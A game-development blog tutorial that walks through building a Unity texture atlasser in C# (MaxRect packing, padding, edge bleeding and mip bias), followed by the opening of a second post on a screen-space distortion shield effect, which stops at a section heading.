So now we have our output set up, let’s start fitting rectangles into other rectangles, shall we? There are lots of algorithms for doing this (many are described in detail here), but the one I like best is the MaxRect algorithm.

The PackTextures Function

The algorithm works by defining a list of “Free Rectangles”, that is, a list of empty rectangles in the target atlas texture. Before the first texture is packed, our list of Free rectangles will contain a single element which has position (0,0), and be the size of the atlas. I’m going to start putting this initial setup into our PackTextures function, which will be the publicly exposed function we call when we want to kick off the TexturePacker.

public static AtlasLayout PackTextures(Texture2D[] textures, int maxWidth, int maxHeight)
{
    AtlasLayout results = new AtlasLayout(maxWidth, maxHeight);

    List<Rect> freeRects = new List<Rect>();
    List<Texture2D> texturesToPlace = new List<Texture2D>(textures);
    //largest area first, since big textures are the hardest to find room for
    texturesToPlace = texturesToPlace.OrderByDescending( x => x.width * x.height).ToList();

    freeRects.Add(new Rect(0,0,maxWidth, maxHeight));
    ...

You’ll notice that I’m also sorting our input textures. This is to make sure that we try to place the larger textures first, since they’re the hardest ones to find space for in an atlas. Linq is awful for runtime performance, but for a build-time tool like our atlasser, it makes our lives a lot easier (and my blog post a lot shorter).

Now we need to start placing textures into the area defined by our free list. To figure out where to place a texture, we’re going to call our FindIdealRect function. This function is going to return two score values to us, along with the candidate rectangle that it finds.

We’re going to call FindIdealRect on every texture that we have to place, and only actually Insert the rectangle which has the best score. Then we’ll remove that texture from the list and do the whole process again.

This looks like this:

...
while (texturesToPlace.Count > 0)
{
	int bestShortSideScore = int.MaxValue;
	int bestLongSideScore = int.MaxValue;
	Texture2D bestTex = texturesToPlace[0];
	Rect bestRect = new Rect();

	foreach(Texture2D curTex in texturesToPlace)
	{
    	int shortSideScore = int.MaxValue;
    	int longSideScore = int.MaxValue;

    	Rect target = FindIdealRect(curTex.width,
    				curTex.height,
    				freeRects,
    				ref shortSideScore,
    				ref longSideScore);

    	if (shortSideScore < bestShortSideScore
    		|| (shortSideScore == bestShortSideScore && longSideScore < bestLongSideScore))
    	{
    		bestShortSideScore = shortSideScore;
    		bestLongSideScore = longSideScore;
    		bestTex = curTex;
    		bestRect = target;
    	}
	}

	if (bestRect.width > 0 && bestRect.height > 0)
	{
		RemoveRectFromFreeList(bestRect, freeRects);
		results.textures.Add(bestTex);
		results.rects.Add(bestRect);
		texturesToPlace.Remove(bestTex);

	}
	else break; //no room left
}
return results;
}

Notice that the scores I was talking about above are named shortSideScore and longSideScore in this code example. The results object we add textures/rectangles to is the AtlasLayout struct we’re going to return. Then we exit the function by returning that struct. In the example above, if we run out of space in the atlas, the packer simply exits early.

In a production system, you’ll want to do something more intelligent than this, but what you do is dependent on your project. For example, I worked on a game with very strict memory budgets for our environment artists. The atlas for an environment couldn’t exceed 1024x1024, so if we went over, the atlasser would expand the target atlas to a size big enough for the textures to fit, but return an error. This allowed the artists to visualize what was exceeding the atlas bounds, but still prevented overly large atlasses from entering production.

Next, it’s time to add some actual texture packing logic to it. To do that we need to flesh out two functions that you may have noticed above:

private static Rect FindIdealRect(int width, int height, List<Rect> freeRects,
    ref int bestShortSideFit, ref int bestLongSideFit);

private static void RemoveRectFromFreeList(Rect rectToRemove, List<Rect> freeRects);

The Placement Function

The Placement Function is where we’re going to actually find a rectangle in the atlas to assign to a texture. There are lots of ways to pick a rectangle out of the free list, but the heuristic I’m going to use is the “Short Side Fit” heuristic. This means that we are going to try to find a free rectangle which has the least amount of remaining space along 1 dimension. This sounds much more abstract than it looks like in code, don’t worry.

So that we have a bit of context, let’s start this section by taking a look at what this function looks like without the finding/scoring logic.

private static Rect FindIdealRect(int width,
				 int height,
				 List<Rect> freeRects,
				 ref int bestShortSideFit,
				 ref int bestLongSideFit)
{
	Rect bestNode = new Rect();

	for (int i = 0; i < freeRects.Count; ++i)
	{
		if (freeRects[i].width >= width && freeRects[i].height >= height)
		{
			// score the rect here

			// if score is the best, replace bestNode with this rect,
			// and set bestShortSideFit and bestLongSideFit to new
			// values
		}
	}

	return bestNode;
}

As you can see, there really isn’t too much to talk about here, it’s just easier to think about the next part when you know how it all fits together.

Let’s look at the scoring code next. Remember all we care about is how much space is left over in the freeRectangle once we place our texture rect into it:

//score the rect here
int remainingX = (int)(freeRects[i].width - width);
int remainingY = (int)(freeRects[i].height - height);

int shortSideFit = Mathf.Min(remainingX, remainingY);
int longSideFit = Mathf.Max(remainingX, remainingY);

// if score is the best...

Once we know our score values, all that’s left is to see if these are the best scores we have, and do something if they are:

// if score is the best, replace bestNode with this rect,
// and set bestShortSideFit and bestLongSideFit to new
// values

if (shortSideFit < bestShortSideFit ||
   (shortSideFit == bestShortSideFit && longSideFit < bestLongSideFit))
{
	bestNode = new Rect(freeRects[i].x,freeRects[i].y, width, height);
	bestShortSideFit = shortSideFit;
	bestLongSideFit = longSideFit;
}

Remember that the bestShortSideFit and bestLongSideFit arguments are going to be read later by the PackTextures function to decide which texture to place next.
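If you'd like to poke at the heuristic without opening Unity, here's the whole placement function again as a standalone Python sketch. It's an approximation of the C# above, not a port: rectangles are plain `(x, y, width, height)` tuples, and the scores are returned alongside the rectangle instead of through `ref` arguments.

```python
def find_ideal_rect(width, height, free_rects):
    """Return (placed_rect, short_side_fit, long_side_fit); placed_rect is None if nothing fits."""
    best_rect = None
    best_short = best_long = float("inf")
    for (fx, fy, fw, fh) in free_rects:
        if fw >= width and fh >= height:
            # How much room is left over along each axis after placement.
            remaining_x = fw - width
            remaining_y = fh - height
            short_fit = min(remaining_x, remaining_y)
            long_fit = max(remaining_x, remaining_y)
            # Tuple comparison: the short side decides, the long side breaks ties.
            if (short_fit, long_fit) < (best_short, best_long):
                best_rect = (fx, fy, width, height)
                best_short, best_long = short_fit, long_fit
    return best_rect, best_short, best_long
```

For a 64x64 texture and free rectangles of 100x100 and 64x200, the second one wins: it leaves zero pixels spare along its short side, even though far more space is wasted overall.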

That’s all there is to this function! All that’s left now is for us to be able to gracefully remove a rectangle from our free list.

The Remove Function

Once we’ve found our target free rect, we add that placed texture rect to our output list, and remove that texture’s area from the free rectangle that it was placed in. In a lot of cases, this is going to give us a shape that isn’t a rectangle any more.

Image from 1000 Ways to Pack The Bin

However, since we are only storing rectangles in our FreeRect list, we need to split this new shape into rectangles. The MaxRect algorithm name refers to the fact that we actually are going to split these kinds of shapes into up to 4 rectangles instead of two, meaning that we will have some overlap.

What this overlap means in practice is that when we need to remove a rectangular area from our list of free rectangles, we have to check every rectangle in the free list and remove / subdivide all the ones that are affected, not just the one that we found to place our texture into. We also need to remove any rectangles in the free list which are wholly encompassed by another rectangle, which can happen as we add more and more textures to the atlas.

We’re going to put all of this in the RemoveRectFromFreeList function that we saw earlier:

private static void RemoveRectFromFreeList(Rect rectToRemove, List<Rect> freeRects);

The signature is pretty straightforward, and to be honest, so is the function, but let’s take a look at the outline of it first:

private static void RemoveRectFromFreeList( Rect rectToRemove,
				        List<Rect> freeRects)
{
    for (int i = 0; i < freeRects.Count; ++i)
    {
    	Rect freeRect = freeRects[i];

    	if (freeRect.Overlaps(rectToRemove))
    	{
    	    //subdivide rectangle here
    	    freeRects.RemoveAt(i--);
    	}
    }

    //remove free rects that are wholly contained by others
}

As discussed, there’s only really two interesting parts to this function, the subdivision of affected rectangles, and the removal of ones that are wholly overlapped by larger ones.

Let’s look at the subdivision first. It’s tempting to think that we only need to split along the top and right sides because we will always be subtracting the texture rect from the bottom left corner of the freeRect. If you’re always working with nicely power of two textures that may be the case, but things can get hairy when you mix in NPOT textures, so we check on all four sides of the input rectangle, like this:

//subdivide rectangle here
if (rectToRemove.x < freeRect.x + freeRect.width && rectToRemove.x + rectToRemove.width > freeRect.x) {
	// New node at the top side of the used node.
	if (rectToRemove.y > freeRect.y && rectToRemove.y < freeRect.y + freeRect.height) {
		Rect newNode = freeRect;
		newNode.height = rectToRemove.y - newNode.y;
		freeRects.Add(newNode);
	}

	// New node at the bottom side of the used node.
	if (rectToRemove.y + rectToRemove.height < freeRect.y + freeRect.height) {
		Rect newNode = freeRect;
		newNode.y = rectToRemove.y + rectToRemove.height;
		newNode.height = freeRect.y + freeRect.height - (rectToRemove.y + rectToRemove.height);
		freeRects.Add(newNode);
	}
}

if (rectToRemove.y < freeRect.y + freeRect.height && rectToRemove.y + rectToRemove.height > freeRect.y) {
	// New node at the left side of the used node.
	if (rectToRemove.x > freeRect.x && rectToRemove.x < freeRect.x + freeRect.width) {
		Rect newNode = freeRect;
		newNode.width = rectToRemove.x - newNode.x;
		freeRects.Add(newNode);
	}

	// New node at the right side of the used node.
	if (rectToRemove.x + rectToRemove.width < freeRect.x + freeRect.width) {
		Rect newNode = freeRect;
		newNode.x = rectToRemove.x + rectToRemove.width;
		newNode.width = freeRect.x + freeRect.width - (rectToRemove.x + rectToRemove.width);
		freeRects.Add(newNode);
	}
}

freeRects.RemoveAt(i--);

(Note: this subdivision code has been shamelessly stolen from the public domain implementation of the MaxRect algorithm on the Unity Wiki)
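To see the overlapping splits in action, here's a standalone Python sketch of the subdivision for a single free rectangle. It's a simplified restatement, not the wiki code: rectangles are `(x, y, width, height)` tuples, both function names are made up, and the four side checks are shortened because the overlap test has already run.

```python
def overlaps(a, b):
    """True if two (x, y, w, h) rects share any area; touching edges don't count."""
    ax, ay, aw, ah = a
    bx, by, bw, bh = b
    return ax < bx + bw and bx < ax + aw and ay < by + bh and by < ay + ah

def split_free_rect(free, used):
    """Return the maximal free rects that remain after carving `used` out of `free`."""
    if not overlaps(free, used):
        return [free]
    fx, fy, fw, fh = free
    ux, uy, uw, uh = used
    pieces = []
    if uy > fy:                      # full-width strip on the low-y side
        pieces.append((fx, fy, fw, uy - fy))
    if uy + uh < fy + fh:            # full-width strip on the high-y side
        pieces.append((fx, uy + uh, fw, fy + fh - (uy + uh)))
    if ux > fx:                      # full-height strip on the low-x side
        pieces.append((fx, fy, ux - fx, fh))
    if ux + uw < fx + fw:            # full-height strip on the high-x side
        pieces.append((ux + uw, fy, fx + fw - (ux + uw), fh))
    return pieces
```

Carving a 4x4 texture out of the corner of an 8x8 free rectangle leaves two pieces, an 8x4 strip and a 4x8 strip, which share the opposite 4x4 corner. That shared corner is the overlap that forces us to check every free rectangle on each removal.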

Finally, all that’s left is to prune our free list of redundant rectangles, meaning any that sit entirely inside another free rectangle:

//remove free rects that are wholly contained by others
for(int i = 0; i < freeRects.Count; ++i)
{
	for(int j = i+1; j < freeRects.Count; ++j)
	{
		if (freeRects[i].IsContainedIn(freeRects[j]))
		{
			freeRects.RemoveAt(i);
			--i;
			break;
		}

		if (freeRects[j].IsContainedIn(freeRects[i]))
		{
			freeRects.RemoveAt(j);
			--j;
		}
	}
}

The only interesting part of this code is the IsContainedIn function, which is just an extension method that I added to the Rect object to make this code more readable. That method is defined as follows:

public static bool IsContainedIn(this Rect a, Rect b)
{
	return a.x >= b.x && a.y >= b.y
		&& a.x+a.width <= b.x+b.width
		&& a.y+a.height <= b.y+b.height;
}
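The pruning pass is easy to try on its own too. Here's a standalone Python sketch with rectangles as `(x, y, width, height)` tuples. Unlike the C# above, it builds a new list rather than removing entries in place, and the function names are only for illustration.

```python
def is_contained_in(a, b):
    """True if rect a lies entirely inside rect b (identical rects count)."""
    ax, ay, aw, ah = a
    bx, by, bw, bh = b
    return ax >= bx and ay >= by and ax + aw <= bx + bw and ay + ah <= by + bh

def prune_contained(free_rects):
    """Return free_rects without any rect that is wholly inside another one."""
    kept = []
    for i, rect in enumerate(free_rects):
        redundant = False
        for j, other in enumerate(free_rects):
            if i == j or not is_contained_in(rect, other):
                continue
            # Identical rects contain each other: keep only the first copy.
            if is_contained_in(other, rect) and i < j:
                continue
            redundant = True
            break
        if not redundant:
            kept.append(rect)
    return kept
```

Feeding it a list where an 8x8 rectangle appears twice alongside two smaller rectangles inside it returns just one 8x8 entry.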

And with that, we’ve covered all the code needed to build a fully featured texture packer! Congratulations! The full source for the finished class is available here: [LINK TO PASTEBIN]

In my implementation, I wrap all of the code thus far in a TexturePacker class. I’m going to assume that you’ve done the same for the rest of this tutorial.

Despite all our hard work, our journey isn’t over. It’s time to put all this code to work and actually make an atlas.

Building the Blitter

As simple as it sounds, the Blitter is actually more nuanced than the packer, because it’s where you really start to dig into the features that you want your Texture Atlasser to have. At its most basic, all it needs to do is copy pixels from one texture to another, so let’s start by getting the simplest implementation possible set up:

public static Texture2D MakeAtlas(ref Texture2D[] textures, out Rect[] packedRects)
{
	AtlasLayout packResults = TexturePacker.PackTextures(textures, 2048, 2048);
	Texture2D outAtlas = new Texture2D(packResults.width, packResults.height);

	//hand the packed order and rects back to the caller as arrays
	textures = packResults.textures.ToArray();
	packedRects = packResults.rects.ToArray();

	for (int i = 0; i < packResults.textures.Count; i++)
	{
		Rect rect = packResults.rects[i];
		Texture2D readableTex = null;

		//load the image uncompressed
		string fileURL = AssetDatabase.GetAssetPath(packResults.textures[i]);
		byte[] imgByes = File.ReadAllBytes(fileURL);
		readableTex = new Texture2D(1,1,TextureFormat.ARGB32,false);
		readableTex.LoadImage(imgByes);

		Color[] pixels = readableTex.GetPixels();
		outAtlas.SetPixels((int)rect.x, (int)rect.y,(int)rect.width,(int)rect.height,pixels);
		outAtlas.wrapMode = TextureWrapMode.Clamp;
		outAtlas.Apply();

	}

	return outAtlas;
}

Make sure you set your wrap mode to clamp, otherwise you’re going to get texture seams when using textures on the edges of the atlas, that might look like this:

You’ll know this is from your wrap mode instead of your mips because the seams won’t go away when you zoom in.

Also notice that in the above, I’m hardcoding the size of our atlas to be 2048x2048. This is just for brevity, in your system, you’ll likely want to revisit this and do something smarter.

There’s a really really big mistake that you can make in your blitter, and that’s using textures that have already been compressed by Unity. Unless you’re importing all your textures as uncompressed, Unity has likely already applied some amount of compression to the textures in your project. If we use the Unity imported textures in our atlas, when the atlas is compressed, we’re going to compress the images inside it twice, which is going to make them look far worse than they have to.

To get around that, you can load the image directly from disk as a byte array and use that instead (like I’m doing above). It’s a few extra lines of code that makes a big difference on your final product. Note that this will only work if your images are jpgs or pngs. If they’re tifs, or psds or something else weird, you’ll have to find a different solution.

What we have here is where most texture atlassing systems seem to stop, and this is a perfectly sensible place to stop if you aren’t going to be mipping your atlasses, but there are two things we can do to make this more friendly, which I’ll talk about next.

Padding Support

One thing we can do is to add support for padding to our blit function. Padding simply means adding space between the different textures that we pack in our atlas:

One key thing to note with padding in an atlas is that we want the padding to be inner padding. For example, if we have a 512x512 texture in the atlas, and we want to add 5 pixels of padding, we are going to add the padding to the perimeter of that texture’s rectangle and render the texture into a 502x502 rectangle in the center. You can do it the other way around, but it’s easier for artists to reason about how much texture space they’re using if we can still say things like “you can fit 4 512x512 textures into a 1024x1024 atlas.”

This means that we’re going to have to resize our input textures on the fly. Luckily Unity has a super handy function already available to us, which takes a UV coordinate and returns the properly bilinearly sampled texel color, nifty right?

So what we’re going to do is modify our function signature to take an integer argument for padding:

public static Texture2D MakeAtlas(ref Texture2D[] textures, out Rect[] packedRects, int padding)

and then modify the code that’s inside the for loop we saw above:

for (int i = 0; i < packResults.textures.Count; i++)
{
	Rect rect = packResults.rects[i];
	Texture2D readableTex = null;

	//load the image uncompressed
	string fileURL = AssetDatabase.GetAssetPath(packResults.textures[i]);
	byte[] imgByes = File.ReadAllBytes(fileURL);
	readableTex = new Texture2D(1,1,TextureFormat.ARGB32,false);
	readableTex.LoadImage(imgByes);

	int localPadding = Mathf.Min(padding, readableTex.width /4);
	rect.x += localPadding;
	rect.width -= localPadding*2;
	rect.y += localPadding;
	rect.height -= localPadding*2;

	for (int x = 0; x < rect.width; x++)
	{
		for (int y = 0; y < rect.height; y++)
		{
			Color pixel = readableTex.GetPixelBilinear(x / rect.width, y / rect.height);
			outAtlas.SetPixel((int)rect.x + x, (int)rect.y +y, pixel);
		}
	}

	outAtlas.wrapMode = TextureWrapMode.Clamp;
	outAtlas.Apply();
}

Ok, now we’re talking!

Notice that we have a check in there to make sure that we never add so much padding that a texture is completely invisible on the atlas, or so much padding that the padded areas overlap.
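The padding arithmetic is small enough to check by hand, but here it is as a standalone Python sketch anyway. The function name is hypothetical, rectangles are `(x, y, width, height)` tuples, and `//` is used to match the integer division in the C# above.

```python
def padded_inner_rect(rect, padding, texture_width):
    """Shrink a packed rect by the padding on every side, clamped per texture."""
    x, y, w, h = rect
    # Never pad by more than a quarter of the texture's width.
    local_padding = min(padding, texture_width // 4)
    return (x + local_padding, y + local_padding,
            w - 2 * local_padding, h - 2 * local_padding)
```

With 5 pixels of padding, a 512x512 slot becomes a 502x502 drawing area starting at (5, 5). For a tiny 8x8 texture the padding is clamped to 2, so a 4x4 area is still left to draw into.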

Edge Bleeding

So this is great, and is going to make sure that (at least on the higher resolution mips), our textures aren’t going to bleed into each other. Unfortunately it means (at least right now), that they’ll instead pick up whatever value we clear our texture to. What we want to do next is to make sure that the areas that contain our padding are filled with the edge colour of the textures inside them. This is going to give us an atlas that looks something like this:

To do this, the easiest way is to simply set the wrapMode of our readableTex to clamp and sample UVs outside of 0 to 1 for the padding regions. In code, this looks like this:

for (int i = 0; i < packResults.textures.Count; i++)
{
    //Some Code Omitted For Brevity

    readableTex.wrapMode = TextureWrapMode.Clamp;
    readableTex.LoadImage(imgByes);

    int localPadding = Mathf.Min(padding, readableTex.width /4);

    Rect innerRect = packResults.rects[i];
    innerRect.x += localPadding;
    innerRect.y += localPadding;
    innerRect.width -= localPadding*2;
    innerRect.height -= localPadding*2;

    for (int x = (int)rect.x; x < (int)rect.x + (int)rect.width; x++)
    {
        for (int y = (int)rect.y; y < (int)rect.y + (int)rect.height; y++)
        {
        	int xSample = x - (int)innerRect.x;
        	int ySample = y - (int)innerRect.y;

        	Color pixel = readableTex.GetPixelBilinear(xSample / innerRect.width, ySample / innerRect.height);
        	outAtlas.SetPixel(x,y, pixel);
        }
    }

    packedRects[i] = innerRect;

}

outAtlas.wrapMode = TextureWrapMode.Clamp;
outAtlas.Apply();

Notice that we have to replace the rectangle in our packedRects array with the inset one (innerRect), otherwise when we use that UV rect, it will include the padding area around the texture, which is less than ideal.
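If it helps to see why sampling outside of 0 to 1 gives us the edge colour, here’s a rough sketch of the UV maths for a single axis. It’s plain C# with hypothetical helper names, and ClampUV is only a stand-in for what the Clamp wrap mode does to a coordinate before the texture is sampled:

```csharp
using System;

public static class EdgeBleed
{
    // UV of an atlas pixel relative to the inner (texture only) rect on one axis.
    // Results below 0 or above 1 mean the pixel sits in the padding.
    public static float ToUV(int pixel, int innerStart, int innerSize)
    {
        return (pixel - innerStart) / (float)innerSize;
    }

    // Stand-in for Clamp wrap mode: out of range coordinates snap to the nearest edge.
    public static float ClampUV(float uv)
    {
        return Math.Max(0f, Math.Min(1f, uv));
    }
}
```

For an inner rect that starts at x = 16 and is 32 pixels wide, atlas pixel 8 maps to a U of -0.25, which clamps to 0 (the left edge of the texture), and pixel 56 maps to 1.25, which clamps to 1 (the right edge).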

Perfect! Now what about those areas that have no texture in them at all… they’re still going to be a problem when we start using lower resolution mips, so we need to fill them in too. What’s worked for me in the past is to visit every pixel and, if it isn’t contained in a UV rect, look along the horizontal and vertical axes until you find the closest pixel that is, and shade using that color.

Your atlas will end up looking something like what I have below. For the purposes of this example, I shrank the rock texture in the above atlas to make some more space.

The code changes to make this work are a bit more involved than before, so I’m going to go through each part instead of throwing all the code at you at once.

First, since we’re going to need to look up colours in our packed textures after they’ve been placed, we’re going to need to store the readable textures we create in an array that we can access later:

Texture2D[] readables = new Texture2D[textures.Length];

Then in the body of the packing loop, we need to assign the readable textures we create to this array:

readables[i] = readableTex;

So far so easy right? Now, after we get out of the packing loop, we need to add a second set of loops, which is going to iterate over all the pixels in our output atlas, and check if they are contained in any of our (unpadded) UV rects. If they aren’t, we’ll grab the texture in the one that’s closest and call GetPixelBilinear again:

for (int x = 0; x < outAtlas.width; ++x)
{
    for (int y = 0; y < outAtlas.height; ++y)
    {
    	float closestDist = float.MaxValue;
    	Color c = Color.clear;

    	for (int r = 0; r < packedRects.Length; ++r)
    	{
            Rect curRect = packedRects[r];
            if (curRect.Contains(new Vector2(x,y)))
            {
            	closestDist = -1;
            	break;
            }

            float d = DistanceToRect(curRect, x,y);

            if (d < closestDist)
            {
            	closestDist = d;
            	float uvX = (x - curRect.x) / curRect.width;
            	float uvY = (y - curRect.y) / curRect.height;
            	c = readables[r].GetPixelBilinear(uvX, uvY);
            }
    	}

    	if (closestDist > -1)
    	{
    	    outAtlas.SetPixel(x,y,c);
    	}
    }
}

outAtlas.wrapMode = TextureWrapMode.Clamp;
outAtlas.Apply();

Not the fastest code in the world, but it churns through filling in the space on an almost empty 2048x2048 texture in a few seconds on my laptop, so I’m calling it good enough for a build time tool. It’s important to make sure that you only call outAtlas.Apply() once, at the end of your function: that’s the call that uploads the modified pixel data to the GPU, and it’s very slow, so if you call it inside a loop you’ll be waiting for a while.

The last bit of code we need is the body of the DistanceToRect function, which returns the squared distance from a given point to the edge of a rectangle (we only ever compare these distances against each other, so we can skip the square root):

private static float DistanceToRect(Rect r, int x, int y)
{
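    //distance along each axis from the point to the nearest edge (0 if we're inside the rect on that axis)
    float xDist = Mathf.Max(Mathf.Abs(x - r.center.x) - r.width / 2, 0);
    float yDist = Mathf.Max(Mathf.Abs(y - r.center.y) - r.height / 2, 0);

    //squared distance: cheaper than a square root, and the ordering is all we need
    return xDist * xDist + yDist * yDist;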
}
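Here’s the same calculation as a standalone sketch that you can run outside of Unity to sanity check the numbers. The rect is passed as its minimum corner and size instead of a Unity Rect, and the name SqrDistanceToRect is mine:

```csharp
using System;

public static class RectDistance
{
    // Squared distance from the point (x, y) to a rect with its minimum corner at (rx, ry)
    // and a size of (rw, rh). Returns 0 for points inside the rect.
    public static float SqrDistanceToRect(float rx, float ry, float rw, float rh, int x, int y)
    {
        float centerX = rx + rw / 2f;
        float centerY = ry + rh / 2f;

        // How far past the edge we are on each axis, or 0 if we're within the rect's span.
        float xDist = Math.Max(Math.Abs(x - centerX) - rw / 2f, 0f);
        float yDist = Math.Max(Math.Abs(y - centerY) - rh / 2f, 0f);

        return xDist * xDist + yDist * yDist;
    }
}
```

For a 20x20 rect with its corner at (10,10), a point inside it returns 0, the point (35,15) is 5 pixels off the right edge and returns 25, and (33,34) is 3 and 4 pixels off two edges and also returns 25.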

Wrapping Things Up

What we have now is a perfectly good Texture Atlasser! With padding and edge bleed, the mips you care most about (the higher resolution ones) are likely going to be completely unblemished. If anything here wasn’t clear, or you just want some source, it’s available at the end of this post.

However, there’s one more thing you can do to make this really shine. If you’re following along, you may have realized that even with all of this set up (and padding cranked), there isn’t really much you can do about the smallest mip level. There’s just too little resolution to reasonably store information about different textures, and no matter how much padding you add, you still end up with some mipping artifacts:

I had to zoom in on my image to highlight the artifacts, forgive the low resolution

To get around this, you can set the mip bias of the texture to a negative number, so that it will always pull from a higher resolution mip. This will make your texture sharper, and prevent it from hitting the lowest mip level (assuming you bias it to -1). This obviously has minor performance implications, but assuming you have the wiggle room to weather them, it’s going to get you a much nicer looking scene.

The code to do this is a little odd, because Unity doesn’t really let you control anything about your mip maps unless you do it when the texture is imported. That’s strange given that you can write other metadata (like we did with our wrapMode earlier) before you save the asset to disk, but regardless, we’re going to need to write a custom texture importer to set our mip bias.

Custom asset importers are pretty easy to build with Unity. Here’s one that gets us the mip bias value we want on our input atlasses:

using UnityEditor;
using UnityEngine;

public class AtlasImporter : AssetPostprocessor
{
    private void OnPostprocessTexture(Texture2D import)
    {
    	if (assetPath.Contains("Atlasses"))
    	{
    	   import.mipMapBias = -1.0f;
    	}
    }
}

Make sure to put this in a script located in an Editor folder in your project, or the code won’t get run. Assuming you’ve done all that correctly, when you regenerate (or reimport) your atlas, those far away seams should be completely cleared up:

You’ll notice that the texture detail visible in the image changes when I change the mip bias. This is expected: we are literally sampling from a different, higher resolution mip map in the second photo, so things aren’t going to look 100% identical to when we didn’t have the bias set.
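As a rough mental model of what the bias does, here’s a small sketch in plain C#. It assumes the GPU adds the bias to the mip level it would normally pick and clamps the result to the levels that exist. Real hardware also blends between levels, so treat this as an approximation, and note that the names are mine:

```csharp
using System;

public static class MipBias
{
    // Number of levels in a full mip chain, counting the full size image as level 0.
    public static int MipCount(int width, int height)
    {
        int size = Math.Max(width, height);
        int count = 1;
        while (size > 1)
        {
            size /= 2;
            count++;
        }
        return count;
    }

    // The level that gets sampled once the bias has been added, clamped to the chain.
    public static float BiasedLevel(float computedLevel, float bias, int mipCount)
    {
        float lowestResLevel = mipCount - 1;
        return Math.Max(0f, Math.Min(lowestResLevel, computedLevel + bias));
    }
}
```

A 2048x2048 atlas has 12 mip levels (0 through 11). With a bias of -1, a surface that would normally sample level 11 (the 1x1 mip) samples level 10 instead, which is why the very smallest mip never gets used.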

With that done, we have our atlasser! It’s worth noting that this won’t solve all your problems if the input textures to your atlasser aren’t power-of-two sized. If yours aren’t, you’ll want to generate your own mips in addition to everything we’ve talked about here. I recommend not letting an NPOT texture get in an atlas meant for 3D content, but if for some reason you must, more info is available from NVidia.

Whew, this covered a lot of ground! In case you weren’t following along at home, all the code that I’ve talked about here has been uploaded to github.

If you have any questions about this, or spot a mistake, shoot me an email, or a twitter message. I check twitter…sorta…not frequently, but I will eventually see it if you send me something there. My email / twitter is available in the sidebar. Have a good one!

Screen Space Distortion and a Sci-fi Shield Effect

2016-01-15T00:00:00+00:00

Sometimes inspiration comes from the weirdest places. I was idly browsing reddit after work a while ago and stumbled onto this post by user Guillaume_Langis. It was a gif of a shield effect that they had created for their game Warfleet. The comments section on that site was filled (predictably) with users asking how the effect was done, and Guillaume ended up actually posting the C# and shader source online for people to play with, which is awesome (thanks!)

The effect already looks great, but when I think of a sci-fi shield I think of distortion and wobbling “force field” style effects. That’s what I’m going to add to the shield in this article, turning it into this:

Some Initial Housekeeping

The space ship in these screen shots is available free on the asset store, and the texture I threw on the shield was just one I got by googling for “plasma texture.” I also took the liberty of optimizing the original effect which was posted to reddit. You can find the original code here.

All the scripts and shaders used in this post will be available at the end of the article, but to start with, I’ve uploaded a Unity project with a scene set up with this effect ready to go so that it’s easy to follow along here. This article is about how to build a distortion effect, not about how to create the shield effect, so that won’t be explained, but it will be a lot easier to follow this post if you have a project set up with it. I haven’t included the space ship or space textures from the screenshots because I didn’t make those, but you should be able to get them yourself pretty easily. As we go through this post, my screenshots will alternate between what the sample scene should look like and what it looks like with real assets.

Ok, now that that’s out of the way, time to get cracking.

The Basics of Screen Space Distortion

Let’s start by talking about what exactly a Screen Space Distortion effect is. You’ve definitely seen the effect before, it’s used to render everything from refraction to heat haze to trippy drug sequences in games, and it’s actually really simple.

At its core, all the effect requires is that you render your main camera (the one which will show the distortion) to a texture instead of rendering it directly to the framebuffer, then blit it (draw it) to the framebuffer from that texture using a shader which offsets the UVs used to sample your main camera texture.

A really simple example might look something like this:

Of course, there isn’t a one size fits all way to modify the UV coordinates, which is where the fun starts. But before we get there, let’s walk through the code required to make the trivial example above actually functional.

First, we need to get our main camera rendering to a secondary texture. Usually when you want a camera to render to a texture in Unity you use the targetTexture attribute of the camera component, but not today. Unity is a bit quirky here, but I’ve found in practice that you can’t blit a texture to the frame buffer if that texture is currently a camera’s target texture. Since we’re going to be blitting this texture to the framebuffer as we apply our post effect, we need to use a different bit of api:

using UnityEngine;

public class ScreenSpaceDistortionEffect : MonoBehaviour
{
    RenderTexture screenRT;
    Camera mainCam;

    void Awake()
    {
    	screenRT = new RenderTexture(Screen.width, Screen.height, 16, RenderTextureFormat.Default);
    	mainCam = GetComponent<Camera>();
    	mainCam.SetTargetBuffers(screenRT.colorBuffer, screenRT.depthBuffer);
    }

    void OnPostRender()
    {
    	Graphics.Blit(screenRT, (RenderTexture)null);
    }
}

The SetTargetBuffers call is how we are going to work around the targetTexture weirdness. If you attach this component to your main camera object, you should see that nothing in your game view is different from before we wrote this script, but behind the scenes we now have a nice, easy to work with RenderTexture for our game. Which is perfect!

Now all we need to do is distort that texture. If you look at the docs for Graphics.Blit, you’ll find that you can specify a material. If you think of Graphics.Blit like a full screen quad, then the material you specify here is just the material on that Quad. Blit automatically sets the _MainTex property of this material to your source render texture. Since all we need to do is modify the texture coordinates that we map to the screen, we can get by with a pretty simple material. The example above uses the following:

vOUT vert(vIN v)
{
    vOUT o;
    o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
    o.uv = v.texcoord;
    return o;
}

fixed4 frag(vOUT i) : COLOR
{
    //offset u by a sine wave driven by v (float2 keeps full precision for the UVs)
    return tex2D(_MainTex, float2( i.uv.x + sin(i.uv.y * 100)*0.01, i.uv.y) );
}

I’m going to call this shader our “composite” shader, since it’s what we’re going to use to combine data about how to render the distortion effect with our regular camera view.

Now you just need to modify the earlier C# code to use this new shader, and you should see exactly the same type of effect across your screen.

RenderTexture screenRT;
Camera mainCam;
Material effectMaterial;
void Awake()
{
    screenRT = new RenderTexture(Screen.width, Screen.height, 16, RenderTextureFormat.Default);
    mainCam = GetComponent<Camera>();
    mainCam.SetTargetBuffers(screenRT.colorBuffer, screenRT.depthBuffer);

    effectMaterial = new Material(Shader.Find("Custom/Composite"));
}

void OnPostRender()
{
    Graphics.Blit(screenRT, (RenderTexture)null, effectMaterial);
}

Voila! We now officially have our post effect working!
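To get a feel for how strong the offset in the composite shader is, here’s a CPU side sketch of the same sine offset in plain C#. The class and method names are hypothetical; the maths is lifted from the fragment shader above:

```csharp
using System;

public static class SineDistortion
{
    // Mirrors the composite shader: u is pushed sideways by a sine wave driven by v,
    // and v itself is left alone.
    public static float DistortU(float u, float v)
    {
        return u + (float)Math.Sin(v * 100.0) * 0.01f;
    }
}
```

The offset never exceeds 0.01 in either direction, which is 1% of the screen width, and because the sine is driven by v * 100 the wave repeats roughly 16 times between the bottom and the top of the screen.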

An Actually Useful Implementation

